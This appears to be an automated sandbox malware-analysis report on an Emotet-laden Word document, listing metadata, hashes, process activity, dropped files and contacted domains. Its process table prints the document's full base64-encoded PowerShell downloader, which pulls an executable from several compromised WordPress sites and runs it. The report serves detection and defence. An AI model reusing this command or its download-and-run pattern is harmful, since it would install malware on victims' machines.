File name: | details3628533.doc |
Full analysis: | https://app.any.run/tasks/3f46faf4-366c-4609-ae8b-a59d5975c970 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:26:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Supervisor Fork, Subject: synthesize, Author: Brando Raynor, Comments: Public-key, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 2EA05092B941BD56A5BE5C93A0B9361A |
SHA1: | AECCD0634FD64CCC813C8F44BB0198D2313A0EA0 |
SHA256: | D1E721DD421D6BAD1DCC2AC1B44C482F89CFC8BDB5A2D5AD744EDB8FD47D41A5 |
SSDEEP: | 6144:TByxNRIIt1POT3XtwNJ6mdNPLkIZ7NSU4jJntATfDdGPy4sSK4:TByxNRIIt1POT3XtwNJ6mdNXZ7NSU4Vv |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Supervisor Fork |
---|---|
Subject: | synthesize |
Author: | Brando Raynor |
Keywords: | - |
Comments: | Public-key |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:38:00 |
ModifyDate: | 2019:09:18 14:38:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Wilderman - Bradtke |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Medhurst |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2760 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\details3628533.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3036 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA05B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\279896E5.wmf | wmf | |
MD5:1C31597DE93A5F0BE36AA5D42B5B23AC | SHA256:7DE1C3C1A602EA1124F4E45E11598B392009ECF94460DFB22AA20185E6749C0E | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:61A05CF1CF86CD484E7AE58F75B09611 | SHA256:FEA19ECAA3BAD28C0369986DF90007550E1ED34794DA05CACD144442C6729D05 | |||
2760 | WINWORD.EXE | C:\Users\admin\Downloads\~$tails3628533.doc | pgc | |
MD5:BFDAE11871801EDEFCFD12C8B117E4A7 | SHA256:DE2721E6549EFFA62E91F20EE281F3CF48423881D953DB959B03738CB90341D0 | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\details3628533.doc.LNK | lnk | |
MD5:6C484FB6E34BD5C0298CDCE05B12AB9C | SHA256:CF97EB8C3912381F4A7BBC9285D57342D889D9408A0FBC30CB9C8CD7C545050F | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:98D391A82325B8A9F20FF8CE7B805E66 | SHA256:291E43DFAC33ECB414F082E34EE2AEFD1D15AD0B84A69E4F2555AFE0785B7397 | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7118DFF3.wmf | wmf | |
MD5:01F548FC6F5642596B1B5CE353D80A56 | SHA256:63DA479512F5A823766122E7F6BC7A6ECBED6E5A0C44CE098A20FC6CCA2C4D6A | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B3BE7A2.wmf | wmf | |
MD5:8E6DEF5B61985AAA923C8E4E256082EC | SHA256:D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C289179.wmf | wmf | |
MD5:96CC9C4B08468C28CF7074368E7E6A53 | SHA256:450063BB002DB2001A2AD3F6DD91C88729E0FC7E7DBF2CF7EB219802D7E24F0C | |||
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5AD1CDD.wmf | wmf | |
MD5:580D15C97EF1A4A0E77C9964518125DC | SHA256:7F924875AD8DA49D8A8FF46DED6A9AC586DB7938E29CF19308A9A7ACB8927B2A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3036 | powershell.exe | GET | 404 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | xml | 345 b | suspicious |
3036 | powershell.exe | GET | 404 | 104.28.5.162:80 | http://trunganh.xyz/wp-content/uzq50/ | US | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3036 | powershell.exe | 104.27.132.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
3036 | powershell.exe | 31.210.70.130:443 | iptivicini.com | Radore Veri Merkezi Hizmetleri A.S. | TR | unknown |
3036 | powershell.exe | 212.47.241.236:443 | www.cezaevinegonder.com | Online S.a.s. | FR | unknown |
3036 | powershell.exe | 104.28.5.162:80 | trunganh.xyz | Cloudflare Inc | US | shared |
3036 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
mnpasalubong.com |
| unknown |
trunganh.xyz |
| suspicious |
iptivicini.com |
| unknown |
www.cezaevinegonder.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3036 | powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |